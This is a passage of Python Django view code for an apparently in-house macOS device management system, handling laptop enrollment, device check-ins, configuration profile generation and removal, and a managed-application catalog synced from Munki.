request.POST['asset_tag'] not in [None, '']:\n laptop.name = request.POST['name']\n laptop.asset_tag = request.POST['asset_tag']\n laptop.user_password = request.POST['user_password']\n laptop.admin_password = request.POST['admin_password']\n laptop.mdm_enrolled = True\n laptop.save()\n template = loader.get_template('default.html')\n return HttpResponse(template.render({'title': \"Success!\",\n 'message': \"This device is now enrolled in the LNL MDM.\",\n 'NO_FOOT': True, 'EXIT_BTN': True}, request))\n else:\n context['form'] = EnrollmentForm(request.POST)\n else:\n context['form'] = EnrollmentForm(instance=laptop)\n return render(request, 'form_crispy.html', context)\n\n\n@require_POST\n@csrf_exempt\ndef mdm_checkin(request):\n \"\"\"\n Endpoint for device check-in. Managed devices will check in each time a new user logs onto the device.\n\n :returns: JSON - If resources are pending install, includes the identifiers needed for the client to fetch and \\\n install them. 
Returns {'status': 200} otherwise.\n \"\"\"\n data = json.loads(request.body)\n laptop = get_object_or_404(Laptop, api_key_hash=sha256(data['APIKey'].encode('utf-8')).hexdigest(),\n mdm_enrolled=True)\n system_profiles = []\n user_profiles = []\n system_profiles_remove = []\n user_profiles_remove = []\n password = None\n\n for record in InstallationRecord.objects.filter(device=laptop, profile__isnull=False, version=\"RM\", active=True):\n profile = record.profile\n if profile.scope == 'System':\n system_profiles_remove.append(profile.pk)\n else:\n user_profiles_remove.append(profile.pk)\n password = settings.MDM_PASS\n\n for profile in laptop.pending.all():\n if profile.pk not in system_profiles_remove and profile.pk not in user_profiles_remove:\n if profile.scope == 'System':\n system_profiles.append(profile.pk)\n else:\n user_profiles.append(profile.pk)\n\n if len(system_profiles) > 0 or len(user_profiles) > 0 or len(system_profiles_remove) > 0 or \\\n len(user_profiles_remove) > 0:\n response_data = {\"status\": 100, \"system_profiles\": system_profiles, \"user_profiles\": user_profiles,\n \"system_profiles_remove\": system_profiles_remove, \"user_profiles_remove\": user_profiles_remove,\n \"removal_password\": password, \"password\": laptop.admin_password}\n else:\n response_data = {\"status\": 200}\n laptop.last_checkin = timezone.now()\n laptop.last_ip = data['networkIP']\n laptop.save()\n return JsonResponse(response_data)\n\n\n@require_POST\n@csrf_exempt\ndef install_confirmation(request):\n \"\"\"\n Endpoint for accepting receipt of install. Managed devices should contact this endpoint anytime new resources are\n installed.\n\n :returns: JSON - {'status': 200}\n \"\"\"\n data = json.loads(request.body)\n device = get_object_or_404(Laptop, api_key_hash=sha256(data['APIKey'].encode('utf-8')).hexdigest(),\n mdm_enrolled=True)\n profiles_installed = data['installed']\n profiles_removed = data['removed']\n apps = data['apps'].split('#')\n for pk in profiles_installed:\n profile = get_object_or_404(ConfigurationProfile, pk=pk)\n timestamp = datetime.datetime.strptime(data['timestamp'], '%Y-%m-%dT%H:%M:%SZ').replace(tzinfo=pytz.UTC)\n metadata = get_profile_metadata(profile, timestamp)\n expiration_date = metadata['expires']\n version = metadata['version']\n device.pending.remove(profile)\n device.installed.add(profile)\n try:\n record = InstallationRecord.objects.get(profile=profile, device=device, active=True)\n record.version = version\n record.expires = expiration_date\n record.installed_on = timezone.now()\n except InstallationRecord.DoesNotExist:\n record = InstallationRecord.objects.create(profile=profile, device=device, version=version,\n expires=expiration_date, active=True)\n record.save()\n for pk in profiles_removed:\n profile = get_object_or_404(ConfigurationProfile, pk=pk)\n device.pending.remove(profile)\n record = InstallationRecord.objects.get(profile=profile, device=device, active=True)\n record.active = False\n record.expires = timezone.now()\n record.save()\n\n installed = []\n for item in apps:\n if item in [None, '']:\n continue\n identifier = item.split('=')[0]\n version = item.split('=')[1]\n app = MacOSApp.objects.filter(name__iexact=identifier).first()\n if app:\n if app.merged_into is not None:\n app = app.merged_into\n if version not in [None, ''] and app.version is None:\n app.version = version\n app.save()\n if app in MacOSApp.objects.filter(pending_install=device):\n app.pending_install.remove(device)\n if app not in 
MacOSApp.objects.filter(installed=device):\n app.installed.add(device)\n if version is None:\n version = app.version\n InstallationRecord.objects.create(app=app, device=device, version=version)\n elif InstallationRecord.objects.get(app=app, device=device, active=True).version != version:\n record = InstallationRecord.objects.get(app=app, device=device, active=True)\n record.active = False\n record.expires = timezone.now()\n record.save()\n InstallationRecord.objects.create(app=app, device=device, version=version)\n else:\n if version not in [None, '']:\n app = MacOSApp.objects.create(name=identifier, version=version)\n else:\n app = MacOSApp.objects.create(name=identifier)\n app.installed.add(device)\n InstallationRecord.objects.create(app=app, device=device, version=app.version)\n installed.append(app)\n\n for app in MacOSApp.objects.filter(installed=device):\n if app not in installed:\n app.installed.remove(device)\n record = InstallationRecord.objects.get(app=app, device=device, active=True)\n record.active = False\n record.expires = timezone.now()\n record.save()\n return JsonResponse({'status': 200})\n\n\ndef get_profile_metadata(config, timestamp):\n \"\"\"\n Retrieve additional metadata from profile data\n\n :param config: Configuration Profile object\n :param timestamp: Timestamp at time of install\n :returns: Dictionary with profile metadata - {'expires': , 'version': }\n \"\"\"\n with open(config.profile) as profile:\n context = json.load(profile)\n data = {}\n expires_on = None\n expires_after = None\n version = str(context['data']['version'])\n\n if context['data']['removal_date'] is not None:\n expires_on = timezone.make_aware(datetime.datetime.strptime(\n context['data']['removal_date'], '%Y-%m-%dT%H:%M:%SZ')\n ).astimezone(pytz.UTC)\n if context['data']['removal_period'] is not None:\n expires_after = timestamp + timezone.timedelta(seconds=context['data']['removal_period'])\n if expires_on is not None and expires_after is not None:\n if expires_on < expires_after:\n expiration_date = expires_on\n else:\n expiration_date = expires_after\n elif expires_on is not None:\n expiration_date = expires_on\n else:\n expiration_date = expires_after\n\n if context['data']['auto_remove'] == 'default':\n expiration_date = None\n\n data['expires'] = expiration_date\n data['version'] = version\n return data\n\n\ndef dock_app_list(data):\n \"\"\"\n Used in generating macOS configuration profiles. Generates a dictionary with details about applications that should\n be added to the Dock.\n\n :param data: Form data (Dictionary)\n :returns: Dictionary - {'name': , 'path': }\n \"\"\"\n apps = []\n count = data['extra_dock'] + 1\n for i in range(count):\n name = data['app_name_%s' % str(i)]\n path = data['app_path_%s' % str(i)]\n if name not in [None, '']:\n apps.append({'name': name, 'path': path})\n return apps\n\n\ndef fw_app_list(data):\n \"\"\"\n Used in generating macOS configuration profiles. 
Generates a dictionary used in configuring Firewall settings.\n\n :param data: Form data (Dictionary)\n :returns: Dictionary - {'bundle_id': , 'allowed': }\n \"\"\"\n apps = []\n count = data['extra_firewall']\n for i in range(count):\n bundle = data['id_%s' % str(i + 1)]\n allowed = data['permit_%s' % str(i + 1)]\n if bundle not in [None, '']:\n apps.append({'bundle_id': bundle, 'allowed': allowed})\n return apps\n\n\ndef get_payloads(data):\n \"\"\"\n Generates a dictionary which specifies which payloads are active in a given profile and what their current\n version numbers are.\n\n :param data: Form data (Dictionary)\n :returns: Dictionary of payload versions\n \"\"\"\n types = ['store', 'siri', 'desktop', 'dock', 'energy', 'finder', 'filevault', 'firewall', 'itunes', 'login',\n 'passcode', 'password', 'restrictions', 'safari', 'screensaver', 'setup', 'software', 'diagnostics',\n 'policy', 'preferences', 'time_machine']\n payloads = {}\n for i, payload in enumerate(types):\n if data.get(types[i] + '_version', None) not in [None, '']:\n payloads[payload] = data.get(types[i] + '_version')\n return payloads\n\n\ndef generate_ids():\n \"\"\"\n Generates UUIDs for each of the profile's payloads.\n\n :returns: Dictionary of payload identifiers\n \"\"\"\n payloads = ['info', 'ad_tracking', 'airdrop', 'store', 'siri', 'desktop', 'desktop_services', 'dock', 'energy',\n 'filevault', 'finder', 'firewall', 'itunes', 'login', 'passcode', 'password', 'restrictions', 'safari',\n 'screensaver', 'setup', 'software', 'diagnostics', 'policy', 'policy_2', 'preferences',\n 'preferences_security', 'time_machine']\n ids = {}\n for i, payload in enumerate(payloads):\n identifier = str(uuid.uuid4()).upper()\n ids[payload] = identifier[9:]\n return ids\n\n\ndef load_ids(data):\n \"\"\"\n Reassembles payload identifiers. This is necessary because the MDM does not store the full payload identifiers\n with the profile data.\n\n :param data: Dictionary of payload identifiers\n :returns: Dictionary of payload identifiers\n \"\"\"\n identifiers = {}\n base_id = settings.MDM_UUID\n for payload in data:\n identifiers[payload] = \"%s-%s\" % (base_id, data[payload])\n return identifiers\n\n\n@login_required\n@permission_required('devices.manage_mdm', raise_exception=True)\n@never_cache\ndef list_profiles(request, pk=0):\n \"\"\"\n When given a `pk` value, this view will list all the configuration profiles for a given device. 
When `pk` is not\n supplied, the view will list all the profiles in the MDM.\n\n :param pk: Primary key of device (Optional)\n \"\"\"\n context = {'items': [], 'resource_type': 'Profile'}\n handle_expired_profiles()\n if pk == 0:\n context['h2'] = \"Configuration Profiles\"\n context['header_1'] = \"Type\"\n context['header_2'] = \"Last Modified\"\n profiles = ConfigurationProfile.objects.all().reverse()\n for profile in profiles:\n assignment_count = profile.pending_install.count()\n install_count = profile.installed.count()\n data = {'filename': str(profile), 'type': \"macOS\", 'meta': profile, 'assignment_count': assignment_count,\n 'install_count': install_count}\n context['items'].append(data)\n else:\n device = get_object_or_404(Laptop, pk=pk)\n context['h2'] = \"Profiles for {}\".format(device.name)\n context['header_1'] = \"Version\"\n context['header_2'] = \"Expires\"\n context['device_view'] = True\n context['device_id'] = pk\n profiles = ConfigurationProfile.objects.filter(pending_install__in=[device])\n profiles |= ConfigurationProfile.objects.filter(installed__in=[device])\n for profile in profiles:\n status = 'Not assigned'\n for entry in profile.installed.all():\n if entry == device:\n status = 'Installed'\n for entry in profile.pending_install.all():\n if entry == device:\n status = 'Assigned'\n record = InstallationRecord.objects.filter(profile=profile, device=device, active=True).first()\n expires_soon = False\n if record is not None and record.expires is not None:\n if timezone.now() < record.expires < timezone.now() + timezone.timedelta(days=30):\n expires_soon = True\n data = {'filename': str(profile), 'downloadable': False, 'install_record': record, 'meta': profile,\n 'status': status, 'expires_soon': expires_soon}\n context['items'].append(data)\n\n return render(request, 'mdm/resource_list.html', context)\n\n\n@login_required\n@permission_required('devices.manage_mdm', raise_exception=True)\ndef link_profiles(request, device=None, profile=None):\n \"\"\"\n Assign configuration profiles to a device. If a primary key value for `device` is supplied, a list of profiles will\n be displayed. The user can then select which profiles to assign to the respective device. 
The opposite is true\n when a primary key value is supplied for `profile`.\n\n :param device: Primary key of device (Optional)\n :param profile: Primary key of configuration profile (Optional)\n \"\"\"\n context = {}\n if device is not None:\n resource_type = \"profiles\"\n rel = get_object_or_404(Laptop, pk=device)\n options = ConfigurationProfile.objects.exclude(Q(pending_install__in=[rel]) | Q(installed__in=[rel]))\n # The following message will be displayed if there are no options (doesn't render in the form view)\n context['message'] = \"It seems like there are no more profiles that can be assigned to this device.\"\n else:\n resource_type = \"devices\"\n rel = get_object_or_404(ConfigurationProfile, pk=profile)\n options = Laptop.objects.filter(mdm_enrolled=True, retired=False)\\\n .exclude(Q(pending__in=[rel]) | Q(installed__in=[rel]))\n # The following message will be displayed if there are no options (doesn't render in the form view)\n context['message'] = \"It seems like there are no more eligible devices to assign this profile to.\"\n if request.method == 'POST':\n form = AssignmentForm(request.POST, type=resource_type, options=options)\n if form.is_valid():\n selected = form.cleaned_data.get('options')\n context['NO_FOOT'] = True\n if isinstance(rel, Laptop):\n for option in selected:\n config = ConfigurationProfile.objects.get(pk=option)\n rel.pending.add(config)\n if len(selected) == 1:\n context['message'] = \"1 profile was assigned to %s\" % rel.name\n else:\n context['message'] = \"%s profiles were assigned to %s\" % (len(selected), rel.name)\n elif isinstance(rel, ConfigurationProfile):\n for option in selected:\n device = Laptop.objects.get(name=option)\n rel.pending_install.add(device)\n context['message'] = \"This profile has been assigned to %s new device(s)\" % (len(selected))\n context['title'] = \"Success!\"\n context['EXIT_BTN'] = True\n context['EXIT_URL'] = reverse(\"mdm:list\")\n return render(request, 'default.html', context)\n else:\n context['form'] = form\n else:\n if options.count() == 0:\n context['title'] = \"Hmm...\"\n context['NO_FOOT'] = True\n return render(request, 'default.html', context)\n context['form'] = AssignmentForm(type=resource_type, options=options)\n return render(request, 'form_crispy.html', context)\n\n\n@login_required\n@permission_required('devices.manage_mdm', raise_exception=True)\ndef profile_devices(request, pk):\n \"\"\"\n List all devices that are linked to a given profile\n\n :param pk: Primary key of configuration profile\n \"\"\"\n context = {}\n profile = get_object_or_404(ConfigurationProfile, pk=pk)\n to_remove = InstallationRecord.objects.filter(profile=profile, device__pending__in=[profile], active=True,\n version=\"RM\")\n pending = Laptop.objects.filter(pending__in=[profile]).exclude(install_records__in=to_remove)\n installed = InstallationRecord.objects.filter(profile=profile, device__installed__in=[profile], active=True)\\\n .exclude(version=\"RM\")\n pending_removal = []\n for record in to_remove:\n pending_removal.append(record.device)\n context['resource'] = profile\n context['resource_type'] = 'Profile'\n context['pending'] = pending\n context['pending_removal'] = pending_removal\n context['installed'] = installed\n context['today'] = timezone.now()\n context['expiration_warning'] = timezone.now() + timezone.timedelta(days=30)\n return render(request, 'mdm/device_list.html', context)\n\n\n@login_required\n@permission_required('devices.manage_mdm', raise_exception=True)\ndef generate_profile(request, pk=0):\n 
\"\"\"\n Create or edit a macOS configuration profile\n\n :param pk: Primary key of configuration profile (Optional)\n \"\"\"\n context = {}\n extra_dock = int(request.POST.get('extra_dock', 0))\n extra_firewall = int(request.POST.get('extra_firewall', 0))\n config = ConfigurationProfile.objects.filter(pk=pk).first()\n edit_mode = False\n if config is not None:\n edit_mode = True\n if request.method == 'POST':\n form = ProfileForm(request.POST, extra_dock=extra_dock, extra_firewall=extra_firewall, edit_mode=edit_mode)\n if form.is_valid() and request.POST['save'] != \"+ Add App\" and request.POST['save'] != \"Add App\":\n context['data'] = form.cleaned_data\n context['password'] = 'Nice Try!'\n context['payloads'] = get_payloads(request.POST)\n context['data']['static_apps'] = dock_app_list(context['data'])\n context['data']['firewall_apps'] = fw_app_list(context['data'])\n\n # If removal date, convert to string\n if context['data']['removal_date'] is not None:\n context['data']['removal_date'] = context['data']['removal_date'].strftime(\"%Y-%m-%dT%H:%M:%SZ\")\n\n # Generate UUIDs for the payloads\n if not edit_mode:\n context['identifiers'] = generate_ids()\n else:\n profile_data = open(config.profile)\n data = json.load(profile_data)\n profile_data.close()\n context['identifiers'] = data['identifiers']\n\n # Save to file\n display_name = request.POST.get('display_name')\n filename = request.POST.get('filename')\n path = os.path.join(settings.MEDIA_ROOT, 'profiles', '{}.json'.format(filename))\n with open(path, 'w') as profile:\n profile.write(json.dumps(context))\n\n new_profile, created = ConfigurationProfile.objects.get_or_create(\n name=display_name,\n profile=os.path.join(settings.MEDIA_ROOT, 'profiles', '{}.json'.format(filename))\n )\n new_profile.scope = context['data']['scope']\n new_profile.save()\n\n # If 'Save and Redeploy' selected, configure MDM to update all previously installed copies as well\n if request.POST['save'] == 'Save and Redeploy':\n laptops = Laptop.objects.all().filter(mdm_enrolled=True, retired=False, installed__in=[new_profile])\n for laptop in laptops:\n laptop.installed.remove(new_profile)\n laptop.pending.add(new_profile)\n\n template = loader.get_template('default.html')\n return HttpResponse(template.render({\n 'title': \"Success!\",\n 'message': \"Your new configuration profile has been generated successfully! 
It is now available for \"\n \"download through the MDM.\",\n 'NO_FOOT': True,\n 'EXIT_BTN': True,\n 'EXIT_URL': reverse(\"mdm:list\")\n }, request))\n else:\n if request.POST['save'] == \"+ Add App\":\n extra_dock += 1\n elif request.POST['save'] == \"Add App\":\n extra_firewall += 1\n context['form'] = ProfileForm(request.POST, extra_dock=extra_dock, extra_firewall=extra_firewall,\n edit_mode=edit_mode)\n else:\n if edit_mode:\n profile_data = open(config.profile)\n file_data = json.load(profile_data)\n if file_data['data']['removal_date'] is not None:\n file_data['data']['removal_date'] = timezone.make_aware(\n datetime.datetime.strptime(file_data['data']['removal_date'], '%Y-%m-%dT%H:%M:%SZ'))\n profile_data.close()\n form = ProfileForm(None, initial=file_data['data'], extra_dock=file_data['data']['extra_dock'],\n extra_firewall=file_data['data']['extra_firewall'], edit_mode=True)\n else:\n identifier = str(uuid.uuid4())\n filename = \"profile-{}\".format(identifier[0:8])\n form = ProfileForm(initial={'filename': filename}, extra_dock=extra_dock, extra_firewall=extra_firewall,\n edit_mode=False)\n context['form'] = form\n\n # Ensure the automatic profile removal options are hidden if not being utilized\n context['custom_script'] = \"$(document).ready(function (){$('#id_auto_remove').change(function (){\" \\\n \"if (this.value == 'default') {$('#div_id_removal_date').hide();\" \\\n \"$('#div_id_removal_period').hide();}else{$('#div_id_removal_date').show();\" \\\n \"$('#div_id_removal_period').show();}});$('#id_auto_remove').change();});\"\n context['msg'] = \"Manage Configuration Profile\"\n return render(request, 'form_crispy.html', context)\n\n\n@require_GET\ndef mobile_config(request, profile_id, action='Install'):\n \"\"\"\n Endpoint for generating and downloading a macOS configuration profile. The request must include the MDM Client\n token for authentication purposes.\n\n If `action` is set to `Uninstall`, the resulting file will cause existing copies of the profile to be removed from\n the device.\n\n :param profile_id: Primary key of configuration profile\n :param action: Either 'Install' or 'Uninstall'\n \"\"\"\n config = get_object_or_404(ConfigurationProfile, pk=profile_id)\n if not request.GET or 'token' not in request.GET:\n raise PermissionDenied\n token = request.GET['token']\n if token != settings.MDM_TOKEN:\n raise PermissionDenied\n with open(config.profile) as profile:\n context = json.load(profile)\n context['UUID'] = \"%s-%s\" % (settings.MDM_UUID, context['identifiers']['info'])\n context['identifiers'] = load_ids(context['identifiers'])\n context['password'] = settings.MDM_PASS\n if action == 'Uninstall':\n context['data']['auto_remove'] = 'expire'\n context['data']['removal_date'] = None\n context['data']['removal_period'] = 15\n temp = loader.get_template('mdm/laptop_settings.xml')\n response = FileResponse(temp.render(context), content_type='application/force-download')\n response['Content-Disposition'] = 'attachment; filename=\"profile.mobileconfig\"'\n return response\n\n\n@login_required\n@permission_required('devices.manage_mdm', raise_exception=True)\ndef remove_device(request, pk):\n \"\"\"\n Removes a device from the MDM. 
Presents warnings and instructions for how to complete the operation correctly.\n\n :param pk: Primary key of device\n \"\"\"\n device = get_object_or_404(Laptop, pk=pk)\n context = {}\n if request.method == 'POST':\n form = RemovalForm(request.POST)\n if form.is_valid():\n device.mdm_enrolled = False\n device.serial = None\n device.asset_tag = None\n device.last_ip = None\n device.last_checkin = None\n device.save()\n template = loader.get_template('default.html')\n return HttpResponse(template.render({'title': 'Device Removed',\n 'message': 'This device is no longer associated with the MDM.',\n 'EXIT_BTN': True, 'EXIT_URL': reverse(\"mdm:list\"), 'NO_FOOT': True},\n request))\n else:\n context['form'] = RemovalForm(request.POST)\n else:\n if device.serial == 'DISCONNECTED':\n context['form'] = RemovalForm(uninstalled=True)\n else:\n context['form'] = RemovalForm()\n return render(request, 'form_crispy.html', context)\n\n\ndef handle_expired_profiles():\n \"\"\"Checks for expired profiles and updates listings accordingly\"\"\"\n expired_profiles = InstallationRecord.objects.filter(expires__lte=timezone.now(), active=True)\n for record in expired_profiles:\n device = record.device\n profile = record.profile\n device.installed.remove(profile)\n record.active = False\n record.save()\n\n\n@login_required\n@permission_required('devices.view_removal_password', raise_exception=True)\ndef removal_password(request):\n \"\"\"Displays the password that can be used to manually remove configuration profiles from managed devices\"\"\"\n context = {'title': 'Profile Removal Password', 'password': settings.MDM_PASS, 'now': timezone.now()}\n return render(request, 'laptops/password.html', context)\n\n\n@login_required\n@permission_required('devices.manage_mdm', raise_exception=True)\ndef remove_profile(request, profile, device=0):\n \"\"\"\n If a primary key value is supplied for both the `device` and `profile`, the user will be able to remove the\n assignment between the profile and that particular device. If only the `profile` is provided, all device assignments\n for the profile will be removed and the profile data will be deleted. In both cases, two options will be presented\n to the user:\n\n 1.) Mark the profile as removed (if the profile had already been removed manually)\n\n 2.) 
Instruct the MDM to remove the profile automatically at the next checkin\n\n :param profile: Primary key of configuration profile\n :param device: Primary key of device (Optional)\n \"\"\"\n context = {}\n config = get_object_or_404(ConfigurationProfile, pk=profile)\n if device == 0:\n # Completely remove Configuration Profile from MDM\n mode = 'delete'\n if config.installed.all().count() == 0:\n config.delete()\n messages.success(request, \"Profile was successfully deleted\", extra_tags='success')\n return HttpResponseRedirect(reverse(\"mdm:list\"))\n else:\n context['form'] = ProfileRemovalForm(mode=mode)\n else:\n # Unlink profile from device\n laptop = get_object_or_404(Laptop, pk=device)\n if config in laptop.pending.all():\n laptop.pending.remove(config)\n record = InstallationRecord.objects.filter(profile=config, device=laptop, active=True, version=\"RM\").first()\n # If record exists (profile is already installed) reset to installed status\n if record is not None:\n laptop.installed.add(config)\n with open(config.profile) as profile:\n context = json.load(profile)\n record.version = str(context['data']['version'])\n record.save()\n messages.success(request, \"Removal request cancelled\", extra_tags='success')\n else:\n messages.success(request, \"Profile is no longer assigned to {}\".format(laptop.name),\n extra_tags='success')\n return HttpResponseRedirect(reverse(\"mdm:list\"))\n elif config in laptop.installed.all():\n mode = 'disassociate'\n context['form'] = ProfileRemovalForm(mode=mode)\n else:\n raise Http404\n\n # If auto-removal option presented, handle form data\n if request.method == 'POST':\n form = ProfileRemovalForm(request.POST, mode=mode)\n if form.is_valid():\n selected = form.cleaned_data['options']\n if selected == 'auto':\n if mode == 'disassociate':\n record = get_object_or_404(InstallationRecord, profile=config, device=laptop, active=True)\n record.version = \"RM\"\n record.save()\n laptop.installed.remove(config)\n laptop.pending.add(config)\n else:\n # Cancel all pending assignments first\n for laptop in config.pending_install.all():\n config.pending_install.remove(laptop)\n\n # Prepare MDM to remove profile from device\n for laptop in config.installed.all():\n record = get_object_or_404(InstallationRecord, profile=config, device=laptop, active=True)\n record.version = \"RM\"\n record.save()\n laptop.installed.remove(config)\n laptop.pending.add(config)\n messages.success(request, \"Profiles will be removed automatically at next checkin\",\n extra_tags='success')\n else:\n if mode == 'disassociate':\n record = get_object_or_404(InstallationRecord, profile=config, device=laptop, active=True)\n record.expires = timezone.now()\n record.active = False\n record.save()\n laptop.installed.remove(config)\n messages.success(request, \"Profile successfully removed from {}\".format(laptop.name),\n extra_tags='success')\n else:\n for laptop in config.installed.all():\n record = get_object_or_404(InstallationRecord, profile=config, device=laptop, active=True)\n record.expires = timezone.now()\n record.active = False\n record.save()\n config.delete()\n messages.success(request, \"Configuration profile deleted successfully\")\n return HttpResponseRedirect(reverse(\"mdm:list\"))\n else:\n context['form'] = form\n return render(request, 'form_crispy.html', context)\n\n\n@login_required\n@permission_required('devices.add_apps', raise_exception=True)\ndef add_app(request):\n \"\"\"\n Administrators can use this page to add new managed applications. 
Non-admin users will have the option\n to request new software. Requests from non-admins will trigger a notification for the Webmaster.\n \"\"\"\n context = {}\n title = \"New Application\"\n if not request.user.has_perm('devices.manage_apps'):\n title = \"Request Application\"\n\n if request.method == 'POST':\n form = NewAppForm(data=request.POST, title=title, request_user=request.user)\n if form.is_valid():\n form.save()\n if title == \"Request Application\":\n message = request.user.name + \" has requested that you add \" + request.POST['name'] + \\\n \" to the list of available applications in the MDM Managed Software Library.
\" \\\n \"Log into the MDM Console to \" \\\n \"view or deny the request.\"\n email = GenericEmailGenerator(subject=\"New MacBook Software Request\", to_emails=settings.EMAIL_TARGET_W,\n body=message)\n email.send()\n messages.success(request, \"Your request has been submitted. The Webmaster will review it shortly.\")\n return HttpResponseRedirect(reverse(\"home\"))\n messages.success(request, \"Application added successfully!\")\n return HttpResponseRedirect(reverse(\"mdm:apps\"))\n else:\n form = NewAppForm(title=title, request_user=request.user)\n context['form'] = form\n context['msg'] = title\n return render(request, 'form_crispy.html', context)\n\n\n@login_required\n@permission_required('devices.view_apps', raise_exception=True)\ndef view_app(request, pk):\n \"\"\"\n Details page for a specific managed application\n\n :param pk: Primary key of managed application\n \"\"\"\n\n app = get_object_or_404(MacOSApp, pk=pk)\n\n context = {'app': app}\n return render(request, 'mdm/app_detail.html', context)\n\n\n@login_required\n@permission_required('devices.view_apps', raise_exception=True)\ndef app_list(request):\n \"\"\"Lists all the applications available through Homebrew\"\"\"\n return render(request, 'mdm/app_list.html', {})\n\n\n@login_required\n@permission_required('devices.manage_apps', raise_exception=True)\ndef update_app_info(request, pk):\n \"\"\"\n Update the metadata for a managed application.\n\n :param pk: Primary key of managed application\n \"\"\"\n context = {}\n\n app = get_object_or_404(MacOSApp, pk=pk)\n\n if request.method == 'POST':\n form = UpdateAppForm(request.POST, instance=app)\n if form.is_valid():\n if request.POST['save'] == \"Save Changes\":\n form.save()\n messages.success(request, \"Application info updated successfully\")\n elif request.POST['save'] == \"Merge\":\n form.save()\n return HttpResponseRedirect(reverse(\"mdm:merge-app\", args=[app.pk]))\n else:\n app = form.instance\n return HttpResponseRedirect(reverse(\"mdm:remove-app\", args=[app.pk]))\n return HttpResponseRedirect(reverse(\"mdm:apps\"))\n else:\n form = UpdateAppForm(instance=app)\n context['form'] = form\n context['msg'] = \"Application Info\"\n return render(request, 'form_crispy.html', context)\n\n\n@login_required\n@permission_required('devices.manage_apps', raise_exception=True)\ndef merge_app(request, pk):\n \"\"\"\n Page for merging two app records together. 
This is helpful when we want to hide duplicates.\n\n :param pk: Primary key of the managed application to be merged\n \"\"\"\n\n context = {}\n\n app = get_object_or_404(MacOSApp, pk=pk)\n\n if request.method == 'POST':\n form = AppMergeForm(request.POST, pk=pk)\n if form.is_valid():\n selected = form.cleaned_data.get('options')\n parent = MacOSApp.objects.get(pk=selected)\n app.merged_into = parent\n app.save()\n if parent.description in [None, ''] and app.description not in [None, '']:\n parent.description = app.description\n if parent.version in [None, ''] and app.version not in [None, '']:\n parent.version = app.version\n if parent.developer in [None, ''] and app.developer not in [None, '']:\n parent.developer = app.developer\n if parent.developer_website in [None, ''] and app.developer_website not in [None, '']:\n parent.developer_website = app.developer_website\n parent.save()\n messages.success(request, 'Applications merged successfully')\n return HttpResponseRedirect(reverse('mdm:apps'))\n else:\n form = AppMergeForm(pk=pk)\n context['form'] = form\n app_name = MacOSApp.objects.get(pk=pk).name\n context['msg'] = 'Merge ' + app_name + ' into...'\n return render(request, 'form_crispy.html', context)\n\n\ndef refresh_managed_software_status():\n \"\"\" Checks the Munki catalogs to retrieve the latest managed software lists \"\"\"\n\n try:\n with open(settings.MEDIA_ROOT + '/software/catalogs/default', 'rb') as catalog:\n data = plistlib.load(catalog)\n\n apps = []\n\n # Grab app data from plist\n for app_data in data:\n app_name = app_data.get('display_name', None)\n app_description = app_data.get('description', None)\n app_version = app_data.get('version', None)\n app_developer = app_data.get('developer', None)\n apps.append({\"name\": app_name, \"description\": app_description.strip(), \"version\": app_version,\n \"developer\": app_developer})\n\n # Update database\n managed_apps = []\n for app in apps:\n obj = MacOSApp.objects.filter(name__iexact=app['name']).first()\n if obj:\n if obj.merged_into is not None:\n obj = obj.merged_into\n obj.managed = True\n managed_apps.append(obj)\n if app['description'] and not obj.description:\n obj.description = app['description']\n if app['developer'] and not obj.developer:\n obj.developer = app['developer']\n if app['version'] and not obj.version:\n obj.version = app['version']\n obj.save()\n else:\n obj = MacOSApp.objects.create(name=app['name'], description=app['description'],\n version=app['version'], developer=app['developer'], managed=True)\n managed_apps.append(obj)\n\n # Check for old managed apps that are no longer in the catalog\n for app in MacOSApp.objects.filter(managed=True).all():\n if app not in managed_apps:\n app.managed = False\n app.save()\n except FileNotFoundError:\n pass\n\n\n@login_required\n@permission_required(\"devices.manage_apps\", raise_exception=True)\ndef reload_from_munki(request, pk):\n \"\"\"\n Refresh an application's record with data from the Munki catalog\n\n :param pk: The primary key of the application to refresh data for\n \"\"\"\n\n app = get_object_or_404(MacOSApp, pk=pk)\n description = app.description\n version = app.version\n app.description = None\n app.version = None\n app.save()\n\n refresh_managed_software_status()\n\n app.refresh_from_db()\n\n if app.description in [None, '']:\n app.description = description\n if app.version in [None, '']:\n app.version = version\n app.save()\n\n return HttpResponseRedirect(reverse(\"mdm:app-detail\", 
args=[pk]))\n\n\n@login_required\n@permission_required('devices.view_apps', raise_exception=True)\ndef list_apps(request, pk=0):\n \"\"\"\n If a value is provided for `pk`, this will list all the managed applications assigned to the respective device.\n Otherwise this will list all the managed apps under the MDM.\n\n :param pk: Primary key of device (Optional)\n \"\"\"\n context = {'items': [], 'resource_type': 'App'}\n\n if pk == 0:\n context['h2'] = \"Managed Applications\"\n context['header_1'] = \"Developer\"\n context['header_2'] = \"Version\"\n refresh_managed_software_status()\n apps = MacOSApp.objects.filter(merged_into__isnull=True).reverse()\n if not request.user.has_perm('devices.manage_apps'):\n apps = apps.filter(managed=True).exclude(installed__isnull=True, pending_install__isnull=True)\n for app in apps:\n assignment_count = app.pending_install.count()\n installed_on = app.installed.all()\n data = {'meta': app, 'assignment_count': assignment_count, 'installed': installed_on}\n context['items'].append(data)\n else:\n if not request.user.has_perm('devices.manage_apps'):\n raise PermissionDenied\n\n device = get_object_or_404(Laptop, pk=pk)\n context['h2'] = \"Applications on {}\".format(device.name)\n context['header_1'] = \"Developer\"\n context['header_2'] = \"Version\"\n context['device_view'] = True\n context['device_id'] = pk\n apps = MacOSApp.objects.filter(pending_install__in=[device])\n apps |= MacOSApp.objects.filter(installed__in=[device])\n for app in apps:\n status = 'Not assigned'\n for entry in app.installed.all():\n if entry == device:\n status = 'Installed'\n for entry in app.pending_install.all():\n if entry == device:\n status = 'Assigned'\n data = {'meta': app, 'status': status}\n context['items'].append(data)\n\n return render(request, 'mdm/resource_list.html', context)\n\n\n@login_required\n@permission_required('devices.manage_apps', raise_exception=True)\ndef list_app_devices(request, pk):\n \"\"\"\n List all devices linked to a specific app\n\n :param pk: Primary key of managed application\n \"\"\"\n context = {}\n app = get_object_or_404(MacOSApp, pk=pk)\n pending = Laptop.objects.filter(apps_pending__in=[app])\n installed = InstallationRecord.objects.filter(app=app, device__apps_installed__in=[app], active=True)\n context['resource'] = app\n context['resource_type'] = 'App'\n context['pending'] = pending\n context['installed'] = installed\n return render(request, 'mdm/device_list.html', context)\n\n\n@login_required\n@permission_required('devices.manage_apps', raise_exception=True)\ndef link_apps(request, device=None, app=None):\n \"\"\"\n Assign managed apps to a device. If a primary key value for `device` is supplied, a list of managed applications\n will be displayed. The user can then select which applications to assign to the respective device. 
